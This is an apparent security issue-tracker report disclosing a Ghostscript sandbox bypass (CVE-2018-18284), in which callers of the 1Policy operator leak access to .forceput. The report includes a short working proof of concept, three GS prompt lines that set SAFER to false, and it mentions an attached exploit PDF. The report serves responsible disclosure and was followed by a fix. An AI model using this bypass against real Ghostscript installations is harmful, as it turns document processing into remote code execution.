New issue
Advanced search Search tips

Issue 1696 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Oct 16
Cc:

Blocking:
issue 1682



Sign in to add a comment

ghostscript: 1Policy is a dangerous operator, but callers are not odef

Project Member Reported by taviso@google.com, Oct 12

Issue description

This operator from gs_setpd.gs is correctly marked as executeonly and marked as a pseudo-operator (odef):

% Apply Policies to any unprocessed failed requests.
% As we process each request entry, we replace the error name
% in the <failed> dictionary with the policy value,
% and we replace the key in the <merged> dictionary with its prior value
% (or remove it if it had no prior value).

% Making this an operator means we can properly hide
% the contents - specifically .forceput
/1Policy
{
  % Roll back the failed request to its previous status.
  SETPDDEBUG { (Rolling back.) = pstack flush } if
  3 index 2 index 3 -1 roll .forceput
  4 index 1 index .knownget
   { 4 index 3 1 roll .forceput }
   { 3 index exch .undef }
  ifelse
} bind executeonly odef


But the operator itself doesn't do very much except for pass the parameters to .forceput, therefore any procedure that calls this pseudo-operator should itself be a pseudo-operator (I know, I know, this is some arcane postscript).

Because the callers are not executeonly or pseudo-operators, we can just extract a reference to it and take complete control of ghostscript:

GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

For a full exploit once you have .forceput, see  bug 1682 .

This is a critical remote code execution vulnerability.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

 
Project Member

Comment 1 by taviso@google.com, Oct 12

This is ghostscript bug 699963

https://bugs.ghostscript.com/show_bug.cgi?id=699963
Project Member

Comment 2 by taviso@google.com, Oct 12

Blocking: 1682
Project Member

Comment 3 by taviso@google.com, Oct 13

Labels: CVE-2018-18284
This is CVE-2018-18284
Project Member

Comment 4 by taviso@google.com, Oct 16

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed in http://git.ghostscript.com/?p=ghostpdl.git;h=8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b

I've sent a heads-up to oss-security.
Project Member

Comment 5 by taviso@google.com, Oct 17

Here is an exploit, just for future reference.
executeonly-bypass.pdf
1.9 KB Download

Sign in to add a comment